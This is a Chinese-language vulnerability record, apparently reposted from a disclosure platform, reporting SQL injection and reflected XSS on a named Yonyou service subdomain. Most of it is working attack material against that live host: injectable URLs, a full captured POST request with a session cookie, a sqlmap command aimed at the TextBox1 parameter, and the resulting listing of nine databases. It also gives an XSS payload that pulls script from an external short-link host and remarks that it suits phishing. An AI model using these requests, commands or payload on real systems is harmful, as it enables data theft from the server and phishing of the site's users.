|用友某子站SQL注入 - VULHUB开源网络安全威胁库

用友某子站SQL注入

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：子站存在几处post注入点及反射xss ### 详细说明： ``` http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?Page=2&xinwenlxbh=&XinWenMC=1 http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20080328001 http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20071204001&XinWenMC=1 http://service.yonyou.com/ajax/ajax,UFIDA.Service.ashx?_method=GetChanPinBB&_session=no ``` ``` POST /AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20061113004&XinWenMC=1 HTTP/1.1 Host: service.yonyou.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20061113004&XinWenMC=1 Cookie: Hm_lvt_4280908fd6c5e0139940ea31e0eb68e1=1423411490; Hm_lpvt_4280908fd6c5e0139940ea31e0eb68e1=1423445237; ASP.NET_SessionId=gepvgwn2b3lfa445vesgxkmd Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 3210 __LastVIEWSTATE_SessionKey=51ff6eeb-d9a0-4c5f-ae02-7d0cc6f8014a&__ContextPath=%2F&_qam_dialog_control=&__VIEWSTATE=%2FwEPDwULLTE4MjExMjI4MzUPZBYCAgMPZBYKAgUPPCsACQEADxYEHghEYXRhS2V5cxYAHgtfIUl0ZW1Db3VudAILZBYWZg9kFgICAw8PFgIeC05hdmlnYXRlVXJsBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA2MTExMzAwNGQWAmYPFQEM562%2B57qm5paw6Ze7ZAIBD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA2MTExMzAwNmQWAmYPFQEM5biC5Zy65b%2Br6YCSZAICD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA2MTExMzAwN2QWAmYPFQEM5aqS5L2T5YWz5rOoZAIDD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA2MTExMzAwOGQWAmYPFQEM5LiT5a626KeG54K5ZAIED2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA3MDIxMjAxMGQWAmYPFQEM5pyN5Yqh5b%2Br6K6vZAIFD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA3MTIwNDAwMWQWAmYPFQEM5bm057uT5LiT5Yy6ZAIGD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA4MDMyODAwMWQWAmYPFQEOTkPmnI3liqHliqjmgIFkAgcPZBYCAgMPDxYCHwIFJlhpbldlbi5hc3B4P3hpbndlbmx4Ymg9WFdMWDIwMDgwMzI4MDAyZBYCZg8VARFOQ%2BS%2FseS5kOmDqOa0u%2BWKqGQCCA9kFgICAw8PFgIfAgUmWGluV2VuLmFzcHg%2FeGlud2VubHhiaD1YV0xYMjAwODAzMjgwMDRkFgJmDxUBDk5D5pyN5Yqh5Lqn5ZOBZAIJD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA4MDMyODAwNmQWAmYPFQEOTkPmnI3liqHmoYjkvotkAgoPZBYCAgMPDxYCHwIFJlhpbldlbi5hc3B4P3hpbndlbmx4Ymg9WFdMWDIwMTAwNDMwMDAxZBYCZg8VAQzmlrDpl7vkv6Hmga9kAgkPEA8WBh4NRGF0YVRleHRGaWVsZAUJTWluZ0NoZW5nHg5EYXRhVmFsdWVGaWVsZAUHQmlhbkhhbx4LXyFEYXRhQm91bmRnZBAVDAznrb7nuqbmlrDpl7sM5biC5Zy65b%2Br6YCSDOWqkuS9k%2BWFs%2BazqAzkuJPlrrbop4bngrkM5pyN5Yqh5b%2Br6K6vDOW5tOe7k%2BS4k%2BWMug5OQ%2BacjeWKoeWKqOaAgRFOQ%2BS%2FseS5kOmDqOa0u%2BWKqA5OQ%2BacjeWKoeS6p%2BWTgQ5OQ%2BacjeWKoeahiOS%2BiwzmlrDpl7vkv6Hmga8V6K%2B36YCJ5oup5paw6Ze757G75Z6LFQwPWFdMWDIwMDYxMTEzMDA0D1hXTFgyMDA2MTExMzAwNg9YV0xYMjAwNjExMTMwMDcPWFdMWDIwMDYxMTEzMDA4D1hXTFgyMDA3MDIxMjAxMA9YV0xYMjAwNzEyMDQwMDEPWFdMWDIwMDgwMzI4MDAxD1hXTFgyMDA4MDMyODAwMg9YV0xYMjAwODAzMjgwMDQPWFdMWDIwMDgwMzI4MDA2D1hXTFgyMDEwMDQzMDAwMQAUKwMMZ2dnZ2dnZ2dnZ2dnZGQCDw8PFgIeBFRleHQFDOetvue6puaWsOmXu2RkAhEPPCsACQEADxYEHwAWAB8BAgVkFgpmD2QWBAIBDw8WAh8CBSNYaW5XZW5aUy5hc3B4P0JpYW5IYW89WFcyMDA4MDUyMDAxMGQWAmYPFQEy55So5Y%2BLRVJQ5rex6ICV6KGM5Lia44CA5pWw5o6n5Yi26YCg5LyB5Lia562%2B57qmVThkAgIPFQEKMjAwOC8wNS8yMGQCAQ9kFgQCAQ8PFgIfAgUjWGluV2VuWlMuYXNweD9CaWFuSGFvPVhXMjAwODA0MjMwMDRkFgJmDxUBMueUqOWPi%2Bi9r%2BS7tumbhuWboueuoeaOp%2BWPikJJ5bqU55So5YaN5bGV5paw5aKD55WMZAICDxUBCjIwMDgvMDQvMjNkAgIPZBYEAgEPDxYCHwIFI1hpbldlblpTLmFzcHg%2FQmlhbkhhbz1YVzIwMDYxMTEzMDAyZBYCZg8VATrog5zmjbfpm4blm6Llho3luqbnibXmiYvlub%2FkuJznlKjlj4sg566h55CG5Y2H57qn5Yir5qC357qiZAICDxUBCjIwMDYvMTEvMTNkAgMPZBYEAgEPDxYCHwIFI1hpbldlblpTLmFzcHg%2FQmlhbkhhbz1YVzIwMDYxMTEzMDA0ZBYCZg8VASrnlKjlj4tFUlAtTkPllpznrb7kuK3lm73mnIDlpKfpkr3kuJrkvIHkuJpkAgIPFQEKMjAwNi8xMS8xM2QCBA9kFgQCAQ8PFgIfAgUjWGluV2VuWlMuYXNweD9CaWFuSGFvPVhXMjAwNjExMTMwMDZkFgJmDxUBIOeUqOWPi0VSUO%2B8jU5D562%2B57qm5bm%2F5Lic5b635piOZAICDxUBCjIwMDYvMTEvMTNkAhUPDxYCHwYFFeW9k%2BWJjemhte%2B8muesrDEvMemhtWRkZGyEMyFwK0D9WnQJnixj4cOg5Q7D&textfield=&ddlXinWenLB=XWLX20061113004&TextBox1=1&Button1=+&__EVENTVALIDATION=%2FwEWDwLO25KWDAKnuseIDAL9xZrmBwLW%2FrzLDQKb3c%2FnBALSkNa7CwKd2L%2FlBgKyuYTlAwLl%2Ff2lDQKD9a6lAgLZgOLwBQLS85D9CwLxrNb6AwLs0bLrBgKM54rGBn9%2FiG7ONSGvbs1Lr0qWStvPanIJ ``` 在搜索框提交数据抓取数据包丢到sqlmap里去跑。虽然是反射性的xss，可用来钓鱼。 ``` http://service.yonyou.com/error.aspx?errinfo=1 ``` ### 漏洞证明： [<img src="https://images.seebug.org/upload/201502/09104148b5d2904269eeaa3c6737a3f0dce3413e.png" alt="sql.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/09104148b5d2904269eeaa3c6737a3f0dce3413e.png) [<img src="https://images.seebug.org/upload/201502/09105453516f79a5e1a51419ae5c64babd258490.png" alt="sq1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/09105453516f79a5e1a51419ae5c64babd258490.png) ``` available databases [9]: [*] master [*] model [*] msdb [*] tempdb [*] test [*] UFServiceClubData [*] UFWeb [*] UFWeb_Dev [*] We7_CMS sqlmap.py -r yonyou.txt -p TextBox1 -D We7_CMS --tables ``` [<img src="https://images.seebug.org/upload/201502/09110433f0aec3241c090184994afc209f698496.png" alt="sq.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/09110433f0aec3241c090184994afc209f698496.png) ``` http://service.yonyou.com//error.aspx?errinfo=1</textarea>'"><script src=http://t.cn/RwAegK3></script> ``` [<img src="https://images.seebug.org/upload/201502/091105439867aad4939431c7047bf2ed5380e141.png" alt="xss.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/091105439867aad4939431c7047bf2ed5380e141.png)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™